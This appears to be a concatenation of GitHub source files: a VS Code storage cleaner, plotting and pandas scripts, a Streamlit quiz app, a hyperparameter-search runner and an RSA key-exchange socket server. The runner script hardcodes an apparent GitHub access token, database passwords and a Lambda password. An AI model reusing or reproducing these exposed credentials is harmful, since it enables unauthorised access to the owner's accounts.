askYesNoQuestion(\"Do you want to provide an alternative path?\"):\n askForValidWSSPath()\n\n folders = parseWSSFolder(wss_path)\n # Mark old and/or unused workspaces as unwanted\n unwanted_folders = [x for x in folders if x.is_old or not x.workspace_exists]\n unwanted_size = sum(x.sizeinbytes for x in unwanted_folders)\n unwanted_size_formatted = format_size(unwanted_size)\n total_size = getSizeOfFolder(wss_path)\n total_size_formatted = format_size(total_size)\n\n if not unwanted_folders:\n printWithColor(\"No unwanted workspaceStorage folder found!\", Fore.GREEN)\n return\n\n percentage = round(100 * unwanted_size / total_size, 2)\n\n printWithColor(\"Found \", end=\"\")\n printWithColor(str(len(unwanted_folders)), Fore.CYAN, end=\"\")\n 
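# editor's comment: the remaining printWithColor calls finish this one summary line with the\n    # total size of the unwanted folders and their share of the whole workspaceStorage directory\n    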
printWithColor(\n f\" folder{'s' if len(unwanted_folders) > 1 else ''} with total size of \", end=\"\"\n )\n printWithColor(unwanted_size_formatted, Fore.CYAN, end=\"\")\n printWithColor(f\". ({Fore.CYAN}{percentage}%{Fore.RESET} of total)\")\n\n if askYesNoQuestion(\n f\"Do you want to clear {Fore.CYAN}ALL{Fore.RESET} unwanted folders?\"\n ):\n try:\n for (i, folder) in enumerate(unwanted_folders):\n print(\n f\"\\rRemoving \\\"{Path(folder.path).name}\\\" \",\n end=\"\",\n )\n printWithColor(\"(\", Fore.MAGENTA, end=\"\")\n printWithColor(str(i + 1), Fore.CYAN, end=\"\")\n printWithColor(\"/\", Fore.MAGENTA, end=\"\")\n printWithColor(str(len(unwanted_folders)), Fore.CYAN, end=\"\")\n printWithColor(\")\", Fore.MAGENTA, end=\" \")\n shutil.rmtree(folder.path)\n print()\n printWithColor(\"Successfully cleared all unused folders!\", Fore.GREEN)\n except KeyboardInterrupt:\n printWithColor(\"Got KeyboardInterrupt. Aborting...\", Fore.RED)\n except Exception as e:\n printWithColor(\n f\"Caught an exception while removing folders: {e}. Aborting...\"\n )\n finally:\n return\n else:\n printWithColor(\"Aborting...\", Fore.RED)\n\n\nif __name__ == \"__main__\":\n try:\n main()\n except KeyboardInterrupt:\n printWithColor(\"\\nGot KeyboardInterrupt. Aborting...\", Fore.RED)\n except Exception as e:\n printWithColor(f\"\\nGot an exception while executing script: {e}\", Fore.YELLOW)\n","repo_name":"DolphyWind/VSCode-WorkspaceStorage-Cleaner","sub_path":"workspaceStorage_cleaner.py","file_name":"workspaceStorage_cleaner.py","file_ext":"py","file_size_in_byte":9148,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"72568019074","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n\nn_lines = 12\nn_blocks = 12\nn_sub_block = 3\nn_per_block = n_blocks / n_sub_block\n\nL = 1.\ndx = L/n_blocks\ndata = np.zeros( (n_blocks, n_blocks) )\nx_lines = np.linspace(0,L,n_blocks+1)\n\nc_map = 'Paired'\nc_map = 'tab10'\noutDir = '/home/bruno/Desktop/gpu_anim/'\n\nfig, ax = plt.subplots(nrows=1, ncols=1)\nfig.set_size_inches(10,10)\nplt.tight_layout()\n\nn_image = 4\ncounter = 2\ndata_1 = np.zeros( (n_blocks, n_blocks) )\n \ni_block = 0\nj_block = 0\n\nfor i in range(n_blocks):\n for j in range(n_blocks):\n if ( i>=i_block*n_per_block and i<(i_block+1)*n_per_block and j>=j_block*n_per_block and j<(j_block+1)*n_per_block):\n data[i][j] = counter\n counter += 1\n if counter >= 11 : counter =2\n# \n# for i in range(n_blocks):\n# for j in range(n_blocks):\n# if ( i=n_blocks/2):\n# data[i][j] = counter\n# counter += 1\n# if counter >= 11 : counter =1\n# \n# for i in range(n_blocks):\n# for j in range(n_blocks):\n# if ( i>=n_blocks/2 and j= 11 : counter =1\n# \n# for i in range(n_blocks):\n# for j in range(n_blocks):\n# if ( i>=n_blocks/2 and j>=n_blocks/2):\n# data[i][j] = counter\n# counter += 1\n# if counter >= 11 : counter =1\n\n\nax.imshow(data, extent=(0,1,0,1), cmap=c_map, vmin=1, vmax=10)\nax.vlines(x_lines, ymin=0, ymax=1, colors='w')\nax.hlines(x_lines, xmin=0, xmax=1, colors='w')\n\n\nax.set_xlim(0,1)\nax.set_ylim(0,1)\nax.set_facecolor('xkcd:black')\nax.yaxis.set_visible('false')\nax.xaxis.set_visible('false')\nax.set_xticklabels([])\nax.set_yticklabels([])\nfig.savefig( outDir + 'gpu_model_{0}.png'.format(n_image), pad_inches=0, bbox_inches='tight')\nn_image += 1\n\n# \n# from shutil import copyfile\n# offset= 5\n# n = 0\n# for n in range(1,10):\n# for i in range(0,5):\n# src = outDir + 'gpu_model_{0}.png'.format(i)\n# dst = outDir + 
'gpu_model_{0}.png'.format(i + n*offset )\n# copyfile(src, dst)\n","repo_name":"bvillasen/cosmo_sims","sub_path":"plotting/gpu_model.py","file_name":"gpu_model.py","file_ext":"py","file_size_in_byte":2012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"24333674406","text":"from random import sample\nfrom typing import List\n\nimport pandas as pd\nimport streamlit as st\n\n\n# Functions ===================================================================\n@st.cache_data\ndef get_data():\n qna_csv = st.secrets[\"QNA_CSV\"]\n df = pd.read_csv(qna_csv)\n df.dropna(inplace=True, axis=0, subset=[\"Question\", \"Answer\"])\n df[\"Choices\"] = (\n df[\"Choices\"].str.split(\";\").apply(lambda x: [item.strip() for item in x])\n )\n df[\"Tags\"] = df[\"Tags\"].str.split(\";\").apply(lambda x: [item.strip() for item in x])\n return df\n\n\n@st.cache_data\ndef get_tag_list(df: pd.DataFrame) -> List[str]:\n \"\"\"\n Returns a list of unique tags from the given DataFrame.\n\n Args:\n df (pd.DataFrame): The DataFrame containing the tags.\n\n Returns:\n List[str]: A list of unique tags.\n \"\"\"\n tags = [tag for tags in df[\"Tags\"] for tag in tags]\n return list(set(tags))\n\n\ndef load_fanfare(n):\n import base64\n\n if n > 9000:\n fanfare_file = open(\"assets/fanfare_9999.mp3\", \"rb\")\n elif n > 75:\n fanfare_file = open(\"assets/fanfare_100.mp3\", \"rb\")\n elif n > 50:\n fanfare_file = open(\"assets/fanfare_75.mp3\", \"rb\")\n elif n > 25:\n fanfare_file = open(\"assets/fanfare_50.mp3\", \"rb\")\n elif n > 10:\n fanfare_file = open(\"assets/fanfare_25.mp3\", \"rb\")\n else:\n fanfare_file = open(\"assets/fanfare_5.mp3\", \"rb\")\n fanfare_html = f'\\n'\n return fanfare_html\n\n\ndef generate_50_set(df, tags):\n filtered_df = df[\n df[\"Tags\"].apply(lambda x: any(item in x for item in selected_tags))\n ].copy()\n filtered_df.sort_values(by=\"ID\").reset_index(inplace=True, drop=True)\n filtered_df = filtered_df.sample(n=50, replace=False).sort_values(by=\"ID\")\n filtered_df.reset_index(inplace=True, drop=True)\n for index, row in filtered_df.iterrows():\n # Create Question Number\n filtered_df.loc[index, \"QNum\"] = f\"Q-{index + 1}\"\n filtered_df[\"Correct\"] = False\n filtered_df[\"Done\"] = False\n filtered_df = filtered_df[\n [\"ID\", \"QNum\", \"Correct\", \"Done\", \"Question\", \"Choices\", \"Answer\", \"Tags\"]\n ]\n return filtered_df.copy()\n\n\n# Setup =======================================================================\nst.set_page_config(page_title=\"Problem Set Generator\", page_icon=\"🔁\")\nst.title(\"The Generator\")\n\nif \"auth\" not in st.session_state:\n st.session_state[\"auth\"] = False\nif \"access\" not in st.session_state:\n st.session_state[\"access\"] = False\n\ndf = get_data()\ntags = get_tag_list(df)\n\n\n# Main ========================================================================\n\nif not st.session_state[\"access\"]:\n st.info(\n \"**You do not have access to the generator.** Please contact the site owner for access.\",\n icon=\"🔒\",\n )\nelse:\n st.success(\" **Generator enabled.**\", icon=\"🟢\")\n\nwith st.expander(\"**Problem Set Generator** ⚙\", expanded=True):\n selected_tags = st.multiselect(\"Select Tags\", tags, default=[\"CHE\"])\n st.session_state[\"selected_tags\"] = selected_tags.copy()\n filtered_df = df[\n df[\"Tags\"].apply(lambda x: any(item in x for item in selected_tags))\n ].copy()\n filtered_df.sort_values(by=\"ID\").reset_index(inplace=True, drop=True)\n\n if len(filtered_df) 
== 0:\n st.error(\"**No questions found!** Please select some tags.\", icon=\"❗\")\n # st.button(\"Generate Problem Set\", disabled=True)\n else:\n if len(filtered_df) > 1:\n num_questions = st.slider(\n \"Number of questions to generate:\",\n min_value=1,\n max_value=len(filtered_df),\n value=len(filtered_df),\n )\n filtered_df = filtered_df.sample(n=num_questions, replace=False)\n else:\n st.info(\" **Only _:red[one]_ question found.**\", icon=\"ℹ️\")\n\n filtered_df.reset_index(inplace=True, drop=True)\n for index, row in filtered_df.iterrows():\n # Create Question Number\n filtered_df.loc[index, \"QNum\"] = f\"Q-{index + 1}\"\n filtered_df[\"Choices\"][index] = sample(row[\"Choices\"], k=4)\n\n filtered_df[\"Correct\"] = False\n filtered_df[\"Done\"] = False\n filtered_df = filtered_df[\n [\"ID\", \"QNum\", \"Correct\", \"Done\", \"Question\", \"Choices\", \"Answer\", \"Tags\"]\n ]\n\n # st.divider()\n generate = st.button(\n \"Generate!\", type=\"primary\", disabled=(not st.session_state[\"access\"])\n )\n\n if generate:\n st.session_state[\"problem_set\"] = filtered_df.copy()\n st.balloons()\n st.toast(\n f\"**:blue[{str(len(filtered_df)).zfill(1)} Questions] generated.** \\nProblem Set ready!\",\n icon=\"🎉\",\n )\n\n# st.divider()\n\n# st.subheader(\"Quick Configs\")\n\n# acol1, acol2, _fill1 = st.columns(3)\n# with acol1:\n# set_pcp = st.button(\"Generate **50 PCP Problems**\", key=\"pcp\")\n# set_gen = st.button(\"Generate **50 GEN Problems**\", key=\"gen\")\n\n# with acol2:\n# set_che = st.button(\"Generate **50 CHE Problems**\", key=\"che\")\n# set_mix = st.button(\"Generate **50 MIX Problems**\", key=\"mix\")\n\n# if set_pcp:\n# set_tags = [\"PCP\"]\n# st.session_state[\"problem_set\"] = generate_50_set(df, set_tags)\n# st.balloons()\n# st.toast(\"**:blue[50 Questions] generated.** \\nProblem Set ready!\", icon=\"🎉\")\n# elif set_gen:\n# set_tags = [\"GEN\"]\n# st.session_state[\"problem_set\"] = generate_50_set(df, set_tags)\n# st.balloons()\n# st.toast(\"**:blue[50 Questions] generated.** \\nProblem Set ready!\", icon=\"🎉\")\n# elif set_che:\n# set_tags = [\"CHE\"]\n# st.session_state[\"problem_set\"] = generate_50_set(df, set_tags)\n# st.balloons()\n# st.toast(\"**:blue[50 Questions] generated.** \\nProblem Set ready!\", icon=\"🎉\")\n# elif set_mix:\n# set_tags = [\"PCP\", \"GEN\", \"CHE\"]\n# st.session_state[\"problem_set\"] = generate_50_set(df, set_tags)\n# st.balloons()\n# st.toast(\"**:blue[50 Questions] generated.** \\nProblem Set ready!\", icon=\"🎉\")\n\n# st.session_state[\"problem_set\"]\n\n# Sidebar settings\nwith st.sidebar:\n st.warning(\n \"ALL PROGRESS IS LOST when you close the tab or press F5 on the page!\",\n icon=\"⚠️\",\n )\n with st.expander(\"Other Settings ⚙\", expanded=True):\n audio_on = st.checkbox(\"🔊 **Enable Fanfare?**\", value=True)\n access_key = st.text_input(\n \"Enter access key to enable generator:\", type=\"password\"\n )\n if st.button(\"Access!\"):\n if access_key == st.secrets[\"ACCESS_KEY\"]:\n st.session_state[\"access\"] = True\n st.toast(\"Access Granted!\", icon=\"🔓\")\n st.experimental_rerun()\n else:\n st.session_state[\"access\"] = False\n st.experimental_rerun()\n\n with st.expander(\"Secret Settings\"):\n password = st.text_input(\"Enter Password to Enable:\", type=\"password\")\n if st.button(\"Submit\", type=\"primary\"):\n if password == st.secrets[\"PASSWORD\"]:\n st.balloons()\n st.toast(\"Authenticated.\", icon=\"🔓\")\n st.session_state[\"auth\"] = True\n else:\n st.error(\"Denied.\", icon=\"🔒\")\n 
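# editor's comment: wrong password, so explicitly revoke any previously granted authentication\n                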
st.session_state[\"auth\"] = False\n\nif audio_on:\n try:\n if generate:\n st.session_state[\"fanfare\"] = load_fanfare(len(filtered_df))\n else:\n st.session_state[\"fanfare\"] = load_fanfare(1)\n except NameError:\n st.session_state[\"fanfare\"] = \"\"\nelse:\n st.session_state[\"fanfare\"] = \"\"\nst.session_state[\"playsound\"] = audio_on\n\nst.divider()\nst.subheader(\"About this Site\")\nst.markdown(\n \"\"\"\n This site was created to help me **generate problem sets** from a _random_ sample of questions.\n The question topics are for the Chemical Engineering Board exam that I've compiled in a CSV file.\n\n The site is built using **[Streamlit](https://streamlit.io)** and is hosted on **[Streamlit Cloud](https://share.streamlit.io/)**.\n\n The site currently has these pages:\n | | |\n | ------------- | --------------------------------------------------------------------------------------------------------------------- |\n | **Generator** | This page allows you to generate a problem set based on the tags you select and number of questions you want. |\n | **Quiz** | This page allows you to take the quiz. You can navigate through the questions using the buttons or the dropdown menu. |\n | **Results** | This page shows you the results of the quiz you took. It also shows you a run chart of your answers. |\n | **Analytics** | This page is specific to me and shows me the analytics of the questions I've answered over time. No peeking ;) |\n \"\"\",\n unsafe_allow_html=True,\n)\n","repo_name":"jskherman/che-pset","sub_path":"App.py","file_name":"App.py","file_ext":"py","file_size_in_byte":9168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33197288965","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jan 4 09:39:50 2022\n\n@author: lillianding\n\"\"\"\n\n#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\nimport pandas as pd\nimport numpy as np\nimport copy\nimport datetime\nimport collections\npd.options.mode.chained_assignment = None # default='warn'\n\n\n\n#waterfall = pd.read_excel('Waterfall Input.xlsx')\nMPP = pd.read_csv('MPP File.csv')\nMPP = MPP[MPP['Build BU Name'] == 'D9']\nMPP = MPP[MPP['EOP Fiscal Quarter'] >= '2021Q4']\nMPP = MPP[MPP['Plant'] == 4070]\nMPP = MPP.drop_duplicates(subset=['Machine #'])\nMPP['Machine #'] = MPP['Machine #']\nMPP['SOP Actual'] = pd.to_datetime(MPP['SOP Actual'],errors='ignore')\nMPP = MPP.set_index('Machine #')\n#MPP['Location'][900886]\n\n\nwaterfall = pd.read_excel('Waterfall Input.xlsx')\nColumn_Name = waterfall.loc[5]\nwaterfall = waterfall.iloc[6:,1:]\nfor c in Column_Name[7:13]:\n #print(c)\n waterfall[c] = pd.to_datetime(waterfall[c],format='%Y-%m-%d',errors='ignore')\n #print()\nfor c in Column_Name[13:17]:\n #print(c)\n waterfall[c] = pd.to_datetime(waterfall[c],format='%Y-%m-%d',errors='ignore')\nwaterfall = waterfall.loc[pd.isnull(waterfall['Slot #']) == False]\n# In[2]:\nSMART = pd.read_excel('Smart Factory.xlsx')\nSMART = SMART.drop_duplicates(subset=['Slot #','Module #'])\nSMART['Revised Complete'] = pd.to_datetime(SMART['Revised Complete'],errors='ignore')\nSMART['Actual Complete'] = pd.to_datetime(SMART['Actual Complete'],errors='ignore')\nSMART['Revised Start Build'] = pd.to_datetime(SMART['Revised Start Build'],errors='ignore')\nSMART['Revised Test Start'] = pd.to_datetime(SMART['Revised Test Start'],errors='ignore')\nSMART['Actual Test Start'] = pd.to_datetime(SMART['Actual Test Start'],errors='ignore')\nSMART['Revised Test Complete'] = 
pd.to_datetime(SMART['Revised Test Complete'],errors='ignore')\nSMART['EOP Plan'] = pd.to_datetime(SMART['EOP Plan'],errors='ignore')\nSMART['EOP Revised'] = pd.to_datetime(SMART['EOP Revised'],errors='ignore')\n# In[3]:\n\nDATA = {\n 'WF Slot #':[],'Slot #':[],'WF Module':[],'Module':[],'WF Hol,Wkd,Revised Start':[],'Hol,Wkd,Revised Start':[],\n 'WF Planned Build Start':[],'Planned Build Start':[],'WF Planned Test Start':[],'Planned Test Start':[],\n 'WF Comp Date Revised EOP':[],'Comp Date Revised EOP':[],'WF Planned EOP':[],'Planned EOP':[]}\nfor index,item in SMART.iterrows():\n if pd.isnull(item['Planned Start Build']):\n continue\n if 'WR' in item['Module #']:\n a = 'Std '\n else:\n a = 'NPI '\n if 'INTC' in item['Module #'] or 'CLNR' in item['Module #'] or 'Cleaner' in item['Product Name'] or 'CLEANER' in item['Product Name']:\n b = 'Clnr'\n else:\n b = 'Pol'\n module = a + b\n pbs2 = item['Planned Start Build']\n if pd.isnull(item['Actual Start Build']) and pd.isnull(item['Revised Start Build']):\n rbs2 = item['Planned Start Build']\n elif pd.isnull(item['Actual Start Build']) == False:\n rbs2 = item['Actual Start Build']\n else:\n rbs2 = item['Revised Start Build']\n if pd.isnull(item['Actual Test Start']) == False:\n pts2 = item['Actual Test Start']\n elif pd.isnull(item['Revised Test Start']) == False:\n pts2 = item['Revised Test Start']\n else:\n pts2 = None\n pEOP2 = item['EOP Plan']\n rEOP2 = item['EOP Revised']\n if item['Slot #'] not in list(waterfall['Slot #']):\n rbs1,pbs1,pts1,rEOP1,pEOP1 = None,None,None,None,None\n #print(item['Slot #'])\n DATA['WF Slot #'].append(None)\n DATA['WF Module'].append(None)\n DATA['WF Hol,Wkd,Revised Start'].append(rbs1)\n DATA['WF Planned Build Start'].append(pbs1)\n DATA['WF Comp Date Revised EOP'].append(rEOP1)\n DATA['WF Planned EOP'].append(pEOP1)\n DATA['Slot #'].append(item['Slot #'])\n DATA['Module'].append(module)\n DATA['Hol,Wkd,Revised Start'].append(rbs2)\n DATA['Planned Build Start'].append(pbs2)\n DATA['Comp Date Revised EOP'].append(rEOP2)\n DATA['Planned EOP'].append(pEOP2)\n DATA['WF Planned Test Start'].append(pts1)\n DATA['Planned Test Start'].append(pts2)\n Append = False\n for IDX,IT in waterfall.iterrows():\n if IT['Slot #'] == item['Slot #']:\n slotN = IT['Slot #']\n moduleN = IT['Module']\n rbs1,pbs1,pts1,rEOP1,pEOP1 = IT['Hol,Wkd,Revised Start'],IT['Planned Build Start'],IT['Planned Test Start'],IT['Comp Date Revised EOP'],IT['Planned EOP']\n if pd.isnull(item['Revised Test Complete']):\n if pd.isnull(pts2):\n if rbs1 != rbs2 or pbs1 != pbs2:\n Append = True\n else:\n if rbs1 != rbs2 or pbs1 != pbs2 or pts1 != pts2:\n Append = True\n else:\n if rbs1 != rbs2 or pbs1 != pbs2 or pts1 != pts2 or rEOP1 != rEOP2 or pEOP1 != pEOP2:\n Append = True\n if Append == True:\n DATA['WF Slot #'].append(slotN)\n DATA['WF Module'].append(moduleN)\n DATA['WF Hol,Wkd,Revised Start'].append(rbs1)\n DATA['WF Planned Build Start'].append(pbs1)\n DATA['WF Comp Date Revised EOP'].append(rEOP1)\n DATA['WF Planned EOP'].append(pEOP1)\n DATA['Slot #'].append(item['Slot #'])\n DATA['Module'].append(module)\n DATA['Hol,Wkd,Revised Start'].append(rbs2)\n DATA['Planned Build Start'].append(pbs2)\n DATA['Comp Date Revised EOP'].append(rEOP2)\n DATA['Planned EOP'].append(pEOP2)\n DATA['WF Planned Test Start'].append(pts1)\n DATA['Planned Test Start'].append(pts2) \n# In[4]:\ndf = pd.DataFrame.from_dict(DATA)\nfor key in ['WF Hol,Wkd,Revised Start','Hol,Wkd,Revised Start','WF Planned Build Start','Planned Build Start','WF Planned Test 
Start','Planned Test Start',\n 'WF Comp Date Revised EOP','Comp Date Revised EOP','WF Planned EOP','Planned EOP']:\n df[key] = pd.to_datetime(df[key],errors='ignore')\n\n# In[5]:\n\nfor IDX,IT in df.iterrows():\n rbs1,pbs1,pts1,rEOP1,pEOP1 = IT['WF Hol,Wkd,Revised Start'],IT['WF Planned Build Start'],IT['WF Planned Test Start'],IT['WF Comp Date Revised EOP'],IT['WF Planned EOP']\n rbs2,pbs2,pts2,rEOP2,pEOP2 = IT['Hol,Wkd,Revised Start'],IT['Planned Build Start'],IT['Planned Test Start'],IT['Comp Date Revised EOP'],IT['Planned EOP']\n if rbs1 == rbs2 and pbs1 == pbs2 and pts1 == pts2 and rEOP1 == rEOP2 and pEOP1 == pEOP2:\n print(True)\n df.drop(IDX)\n\n# In[6]:\ndf.to_csv('Progress_Revised.csv')\n\n\n\n","repo_name":"Lillianyyding/Production-Planning","sub_path":"Read_Progress.py","file_name":"Read_Progress.py","file_ext":"py","file_size_in_byte":6511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10130764927","text":"import os\nos.system(\"pip install loguru==0.5.3\")\nos.system(\"pip install pandas==1.3.5\")\nos.system(\"pip install psycopg2-binary==2.9.1\")\nos.system(\"pip install sqlalchemy-cockroachdb==1.4.3\")\nimport glob\nimport uuid\nfrom loguru import logger\nimport os\nfrom sqlalchemy import create_engine, text, update\nimport pandas as pd\nimport sys\nimport logging\nimport json\nimport pprint\nimport urllib.request\nimport urllib.parse\n\nlogging.basicConfig()\nlogging.getLogger('sqlalchemy.engine').setLevel(logging.INFO)\nPATIENCE_DAYS = 2\ngithub_token = \"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\"\n\ndef update_timestamp(timestamp, parameter_id):\n with engine.connect() as conn:\n if timestamp == None:\n sql_update_timestamp = \"UPDATE parameters_search SET start_running_timestamp = NULL WHERE parameter_id = '{}';\".format(parameter_id)\n else:\n sql_update_timestamp = \"UPDATE parameters_search SET start_running_timestamp = '{}' WHERE parameter_id = '{}';\".format(timestamp, parameter_id)\n res = conn.execute(text(sql_update_timestamp))\n logger.info(\"Updating timestamp: {} - {}\".format(res, sql_update_timestamp))\n\n\ndef update_results(murmur_file, outcome_file, mean_murmur, std_murmur, std_outcome, mean_outcome, parameter_id):\n with engine.connect() as conn:\n sql_update_timestamp = \"UPDATE parameters_search SET murmur_file = '{}', outcome_file = '{}', mean_murmur = '{}', std_murmur='{}', std_outcome='{}', mean_outcome='{}' WHERE parameter_id = '{}';\".format(murmur_file, outcome_file, mean_murmur, std_murmur, std_outcome, mean_outcome, parameter_id)\n res = conn.execute(text(sql_update_timestamp))\n logger.info(\"Updating timestamp: {}\".format(res))\n\n\nos.system(\"curl --create-dirs -o $HOME/.postgresql/root.crt -O https://cockroachlabs.cloud/clusters/6cadd36b-9892-418c-88c7-64a5781755ec/cert\")\n\ndir_path = os.getcwd()\n\ntry:\n os.system(\"apt install -y vim\")\n os.system(\"apt install -y htop\")\n os.system(\"apt install -y libsndfile1\")\n os.system(\"apt install -y unzip\")\nexcept:\n logger.warning(\"You need these libs installed.\")\n\n\nwhile True:\n logger.info(\"Get parameter to run.\")\n os.environ['DATABASE_URL'] = \"cockroachdb://ohh:nZ-eJfpX1fro6l-b9szvCg@free-tier11.gcp-us-east1.cockroachlabs.cloud:26257/defaultdb?sslmode=verify-full&options=--cluster%3Damped-fox-1436\"\n os.environ['DATABASE_URL_PSY'] = \"postgresql://ohh:nZ-eJfpX1fro6l-b9szvCg@free-tier11.gcp-us-east1.cockroachlabs.cloud:26257/defaultdb?sslmode=verify-full&options=--cluster%3Damped-fox-1436\"\n engine = 
create_engine(os.environ[\"DATABASE_URL\"])\n conn = engine.connect()\n db_df = pd.read_sql(\"SELECT * FROM parameters_search\", con = conn)\n if db_df[pd.isnull(db_df[\"murmur_file\"])].shape[0] == 0:\n logger.info(\"No parameters to run.\")\n sys.exit(0)\n\n current_timestamp = str(pd.Timestamp.now())\n\n logger.info(\"Check if pending running\")\n rows_to_fix = db_df[((pd.Timestamp.now() - pd.to_datetime(db_df[\"start_running_timestamp\"])).dt.days >= PATIENCE_DAYS) & (pd.isnull(db_df[\"mean_murmur\"]))]\n if rows_to_fix.shape[0] > 0:\n logger.info(\"Fix processes without result for more than 48h\")\n for row_id, row in rows_to_fix.iterrows():\n update_timestamp(None, row.parameter_id)\n logger.success(\"Fixing parameters: {}\".format(row.parameter_id))\n db_df = pd.read_sql(\"SELECT * FROM parameters_search\", con = conn)\n\n logger.info(\"Sampling a parameter\")\n parameter_run = db_df.sample().iloc[0]\n logger.info(\"Update timestamp running\")\n db_df.loc[parameter_run.name] = parameter_run\n update_timestamp(current_timestamp, parameter_run.parameter_id)\n\n \n #Cleaning from previous run \n os.system(\"rm -r ./cross-validation-data-1-0-3/\")\n os.system(\"rm -r ./circor-heart-sound/\")\n os.system(\"rm -r ./physionet22/\")\n os.system(\"rm ./murmur_final_result_current.csv\")\n os.system(\"rm ./outcome_final_result_current.csv\")\n \n\n os.system(\"mkdir -p ./cross-validation-data-1-0-3/\")\n os.system(\"mkdir -p ./circor-heart-sound/1.0.3/\")\n os.system(\"git clone --branch matheus https://matheus:{}@github.com/maraujo/physionet22.git\".format(github_token))\n assert os.system(\"pip install -r ./physionet22/requirements.txt\") == 0\n assert os.system(\"pip install tensorflow==2.8.2\") == 0\n\n os.system(\"rm the-circor-digiscope-phonocardiogram-dataset-1.0.3.zip\")\n assert os.system(\"wget https://physionet.org/static/published-projects/circor-heart-sound/the-circor-digiscope-phonocardiogram-dataset-1.0.3.zip\") == 0\n assert os.system(\"unzip -q -o the-circor-digiscope-phonocardiogram-dataset-1.0.3.zip\") == 0\n assert os.system(\"mv ./the-circor-digiscope-phonocardiogram-dataset-1.0.3/training_data ./circor-heart-sound/1.0.3/\") == 0\n\n os.chdir('physionet22/')\n os.system(\"python generate_crossvalidation_splits.py\")\n os.system(\"rm ../the-circor-digiscope-phonocardiogram-dataset-1.0.3.zip\")\n os.system(\"rm -rf ../the-circor-digiscope-phonocardiogram-dataset-1.0.3\")\n os.system(\"rm -rf ../circor-heart-sound\")\n os.system(\"rm -rf ../hyperparameters*\")\n os.system(\"rm -rf ../threshold_*\")\n\n logger.info(\"Saving ohh.config with the following parameters: \\n{}\".format(pprint.pformat(parameter_run.to_dict())))\n with open(\"ohh.config\", \"w\") as ohh_config_fpr:\n json.dump(parameter_run.to_dict(), ohh_config_fpr) \n\n assert os.system(\"python ./test_code_crossvalidation_splits.py\") == 0\n\n murmur_df = pd.read_csv(\"../murmur_final_result_current.csv\")\n outcome_df = pd.read_csv(\"../outcome_final_result_current.csv\")\n murmur_mean = murmur_df['Weighted Accuracy'].mean()\n murmur_std = murmur_df['Weighted Accuracy'].std()\n outcome_mean = outcome_df['Cost'].mean()\n outcome_std = outcome_df['Cost'].std()\n update_results(json.dumps(murmur_df.to_dict()), json.dumps(outcome_df.to_dict()), murmur_mean, murmur_std, outcome_std, outcome_mean, parameter_run.parameter_id)\n\n text_result = \"\"\n text_result += urllib.parse.quote(open(\"ohh.config\").read() + \"\\n\")\n text_result += urllib.parse.quote(open(\"../murmur_final_result_current.csv\").read() + 
\"\\n\")\n text_result += urllib.parse.quote(open(\"../outcome_final_result_current.csv\").read() + \"\\n\")\n urllib.request.urlopen(\"https://vorkqcranza3s6f66wloniatvy0duufg.lambda-url.us-east-1.on.aws/?destiny=matheus.ld.araujo@gmail.com&text={}&password=FIYl4lXi6QHMJHth&subject=DoneLambda\".format(text_result))\n os.chdir(dir_path)\n","repo_name":"maraujo/physionet22","sub_path":"run_hyperparameters_search.py","file_name":"run_hyperparameters_search.py","file_ext":"py","file_size_in_byte":6499,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"71494389635","text":"import socket\nimport pickle\nfrom cryptography.hazmat.primitives import hashes\nfrom cryptography.hazmat.primitives.asymmetric import rsa, padding\nfrom cryptography.hazmat.primitives.serialization import Encoding, PublicFormat\n\nHOST = \"10.0.0.4\"\nPORT = 10100\n\ndef __generate_private_key() -> rsa.RSAPrivateKey:\n private_key = rsa.generate_private_key(\n public_exponent=65537,\n key_size=2048,\n )\n return private_key\n \n\ndef __get_public_key(private_key: rsa.RSAPrivateKey) -> bytes:\n return private_key.public_key() \\\n .public_bytes(Encoding.PEM, PublicFormat.SubjectPublicKeyInfo)\n\n\ndef send_public_key(conn: socket) -> rsa.RSAPrivateKey:\n private_key = __generate_private_key()\n public_key = __get_public_key(private_key)\n\n conn.send(pickle.dumps(public_key)) \n \n return private_key\n\n\ndef get_filename(conn: socket) -> str:\n filename_bytes = conn.recv(1024)\n filename = filename_bytes.decode()\n conn.send(b\"ACK\")\n return filename\n\n\ndef __decode_line(line: bytes, private_key: rsa.RSAPrivateKey) -> bytes:\n decrypted = private_key.decrypt(\n line,\n padding.OAEP(\n mgf=padding.MGF1(algorithm=hashes.SHA256()),\n algorithm=hashes.SHA256(),\n label=None\n )\n )\n return decrypted\n\n\ndef receive_master_key(filename: str, private_key: rsa.RSAPrivateKey, conn: socket) -> None:\n file_path = f\"/home/test/ftp/{filename}-master.keys\"\n try:\n while True:\n key = conn.recv(4096)\n line = pickle.loads(key)\n if not line or line == \"END\":\n break\n with open(file_path, \"wb\") as file:\n file.write(__decode_line(line, private_key))\n conn.send(b\"ACK\")\n except Exception as e:\n print(e)\n \n\nwith socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n s.bind((HOST, PORT))\n s.listen()\n while True:\n conn, addr = s.accept()\n with conn:\n while True:\n message = conn.recv(8)\n if not message:\n break\n if message == b\"INIT\":\n private_key = send_public_key(conn)\n elif message == b\"FNAM\":\n filename = get_filename(conn)\n elif message == b\"MKEY\":\n receive_master_key(filename, private_key, conn)\n ","repo_name":"vadrif-draco/CSE451-CompAndNetSec-Project","sub_path":"client_server_comm/server_client.py","file_name":"server_client.py","file_ext":"py","file_size_in_byte":2479,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"2018948815","text":"from numpy import gradient, transpose\nimport torch\n\n\"\"\"\n For Task 4.1\n\"\"\"\n\n# Input data\nx = torch.tensor([[7, 8, 9], [10, 11, 12]],\n dtype=torch.float32,\n requires_grad=True)\n\n# Standard linear layer\nlinear_torch = torch.nn.Linear(in_features=3,\n out_features=2,\n bias=False)\n\n# Manually set the weights in the layer\nw = torch.tensor([[1, 2, 3], [4, 5, 